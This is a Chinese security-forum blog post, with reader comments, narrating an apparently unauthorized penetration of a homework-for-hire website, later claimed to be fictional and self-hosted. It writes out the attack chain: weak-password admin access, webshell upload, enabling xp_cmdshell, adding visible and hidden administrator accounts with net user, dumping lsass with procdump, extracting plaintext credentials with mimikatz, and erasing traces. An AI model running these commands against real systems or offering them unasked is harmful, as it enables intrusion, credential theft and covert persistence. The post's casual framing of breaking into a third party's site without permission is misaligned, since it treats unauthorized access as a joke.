记一次有趣的渗透测试
p0desta 渗透测试 15357浏览 · 2019-07-16 01:10

别人都放假了我们却还在小学期中,这两天女朋友老是抱怨小学期作业难做,然后她今天发现淘宝上有人花钱代做,遂发来网址让我看看

咱也不知道,咱也不敢问

然后反手一个弱口令进了后台

其实这个站有注入,不过既然进了后台,那肯定要去shell啊,找了个学生的账号登陆进入发现了头像上传点可以任意文件上传

直接传了个大马,执行命令看下权限

这权限也太小了吧,先来提权,看下补丁

这还不随便打了,传了几个提权exe之后发现都执行不了,可能被杀软杀掉了,然后尝试抓hash

看来只有pwdump7.exe没被杀了,但是权限不够

现在我们的权限能去读一些文件,去翻一翻sqlserver的密码,尝试sqlserver来提权

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

成了,有权限了,尝试加个管理员?

exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码test
exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

Wtm,加不上啊,杀软拦了,再次使用pwdump7来抓hash

本来就开着3389,直接连上去

Wtm开着管家和金山,传的东西都被拦截了,关掉杀软,先加个隐藏用户

net user test$ pinohd123. /add
net localgroup administrators test$ add

这里lz1y告诉我也可以procdump去搞,procdump是官方的工具,不会被杀软杀

exec master..xp_cmdshell 'xxxx\images\button\Procdump.exe -accepteula -ma lsass.exe -o xxx.dmp'

把2.dmp存到本来来配合mimikatz

mimikatz.exe
sekurlsa::minidump 2.dmp
sekurlsa::logonPasswords full

同样拿到明文。

奈何没有域,擦了脚印溜了。

好了 以上问题纯属虚构,环境也是自己搭的。(告辞

13 条评论
某人
表情
可输入 255
杨356l
2019-08-07 14:05 0 回复

哈哈


mlry
2019-07-21 04:03 0 回复

在没有看到后面那句话的时候我一直都当真了


三顿
2019-07-18 01:31 0 回复

女不女朋友不重要,我就想知道”怎么擦了脚印“,脚本清理吗?


道萝岗特森
2019-07-17 14:14 0 回复

又气又菜又没有女朋友的学弟想打人==


sun****
2019-07-17 03:27 0 回复

哪里有趣了

没有授权就是违法!


p0desta
2019-07-17 02:02 0 回复

@wah**** 起因有趣哇>_>


wah****
2019-07-17 01:46 0 回复

先告诉我,哪里有趣了?!>_>


shiyan
2019-07-16 13:22 0 回复

同楼上,这秀女朋友,确实有点违规了。


MengChen
2019-07-16 08:31 0 回复

上来先秀一波女朋友,违规了


Daybreak
2019-07-16 07:08 0 回复

换个存储过程就可以添加命令


离怀秋
2019-07-16 04:30 0 回复

上来先秀一波女朋友,违规了


Zthero
2019-07-16 03:26 0 回复

又气又菜又没有女朋友的学长想打人==


kingkk
2019-07-16 03:09 1 回复

上来先秀一波女朋友,违规了


目录